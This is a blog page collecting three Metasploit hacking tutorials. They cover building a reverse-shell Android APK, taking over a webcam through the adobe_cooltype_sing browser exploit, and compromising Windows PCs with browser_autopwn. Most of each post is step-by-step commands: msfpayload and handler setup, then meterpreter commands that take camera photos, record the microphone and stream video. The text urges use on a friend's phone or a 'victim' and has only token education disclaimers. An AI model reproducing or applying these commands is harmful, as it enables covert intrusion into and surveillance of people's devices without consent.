Tampilkan postingan dengan label Metaspolit. Tampilkan semua postingan
Tampilkan postingan dengan label Metaspolit. Tampilkan semua postingan

Selasa, 16 Februari 2016

How to access a Remote Shell on an Android using Metasploit

How to access a Remote Shell on an Android Phone using Metasploit




You will need ...

  • Linux Based System
  • A brain :) 
  • Knowledge of linux or maybe not....

To begin the process , we need to create an APK that will incorporate a remote shell. To do such, we will utilize the msfpayload command from Metasploit.

In Kali Linux (what i will be using) , fire up a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk



The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file or application with it. You will need to put your Kali Linux IP address in for the LHOST address highlighted in BOLD . You may want to change the port address also if you please.

Once this is executed, a file called “app.apk” will be created on the desktop:


Now just send this file to your Android device or device you wanna hack maybe your friends phone ;) , I used a Samsung Android Phone in this case.

Next we got to set Metasploit up to listen for all incoming connections.

In Kali OS  , start Metasploit from the menu or by executing “msfconsole” in a Terminal window.


Once Metasploit fires up, type the following commands to create a listener:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.16 (enter your Kali IP address)
set LPORT 4444 (your choice between ports 2834 and 4500 )
And to start the handler type exploit


When you run the app on your Android device or victims runs it. It will pop up as a large “M” icon with “Main Activity”or something of that sort.

 A large button will appear on your phone that displays, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metaploit Framework you should see this:

An active session as shown is already created and it leads you automatically into a meterpreter prompt / command interface.

 From there your can type ~sysinfo~ and device information will be displayed to you also you can type "ps" and the processes running will be displayed.



Typing “help” at a meterpreter prompt will list all the command that are available.

Amazing stuff you can with your running meterpreter session

Search for a file

meterpreter > search –f *.mp4



Take photos using the devices cameras


First list all the webcams that are available:

meterpreter > webcam_list

You can now run the webcam_snap command, by default it takes a photo using the first camera:

meterpreter > webcam_snap


If you want to take a photo using the second camera

meterpreter > webcam_snap –I 2


Record sound with the microphone

Run the record_mic command:

meterpreter > record_mic 5

Audio saved to: /root/JxltdUyn.wav

Run the following command to stream from the second camera:

meterpreter > webcam_stream –I 2


Any Issue or thing you dont understand feel free to comment below ... Thanks 




Read more

Kamis, 11 Februari 2016

How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)

How to hack WebCam using Metasploit(Kali Linux/ Backtrack)





{How to Hack WebCam using Metasploit(Kali Linux/ Backtrack). So today we are going to learn about How to Hack WebCam using Metasploit(Kali Linux/ Backtrack). I will teach you how you guys can easily Hack WebCam using Metasploit(Kali Linux/ Backtrack). All you need is linux based OS and Metasploit.



Requirements:

How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)


How to Hack WebCam using Metasploit(Kali Linux/ Backtrack). Our main reason for this tutorial is to indicate exactly how simple it is, so you will take better mindfulness that it is possible, and take security and protect yourself. So lets get started: How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)


Open Metasploit And write the following commands step by step :)
  • msf> show exploits
  • msf> use windows/browser/adobe_cooltype_sing
  • msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
  • payload=> windows/meterpreter/reverse_tcp
  • msf exploit(adobe_cooltype_sing) > show options

    Windows Platform Testing

  • msf exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.58
  • SRVHOST => 192.168.0.58
  • msf exploit(adobe_cooltype_sing) > set SRVPORT 80
  • SRVPORT => 80
  • msf exploit(adobe_cooltype_sing) > set uripath /
  • uripath => /
  • msf exploit(adobe_cooltype_sing) > set uripath /
  • uripath => /
  • msf exploit(adobe_cooltype_sing) >exploit -j
  • Let the victim open your IP in their (his/her)  browser and when it will be opened, you will get 1 meterpreter session.
  • msf exploit(adobe_cooltype_sing) > session -i 1
  • meterpreter> run webcam  
  • And you will get access to the webcam of the targeted victim .
  • Congratulations you did it :D !!

How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)






I hope you got everything. My next tutorial will be about Using Metasploit to Hack an Android Phone. STAY CONNECTED ;)

If you have any queries fell free to comment below.


Read more

Senin, 14 April 2014

Hack Remote Windows 7 | XP PC With Metasploit (Browser Auto Pwn Vulnerability)

Hi all this is one of the popular attack know as browser auto pwn Vulnerability which we are going to use in this tutorial.

This is a simple vulnerability that allow attacker to hack to remote machine just by a single click by the victim.
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

-::Using Metasploit::-

In Metasploit there is a module known as browser autopwn. The basic idea behind that module is that it creates a web server in our local machine which will contain different kind of browser exploits. When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open.

Follow these steps to carry out the attack :-

1). Open you backtrack/kali terminal make sure metasploit is there (which is present by default :D ).

2). Type #msfconsole on terminal



3). Now follow these steps as show in image

4). Use the browser_autopwn module

use browser auto pwn


5).We have set up the LHOST with our IP address,the port to be 4445 and the URIPATH with / in order to prevent metasploit to set up random URL’s.now you will see below image.

server started with 16 module
Server started with 16 module.

6). Next we need to send the link to victim (like here http://192.168.205.131:8080/).as soon as the victim open the link its all done.

We have the meterpreter shell control in out hand you can do various activity you wish with meterpreter shell functionality.


Enjoy the hack of your victim machine have fun .!!!!

Read more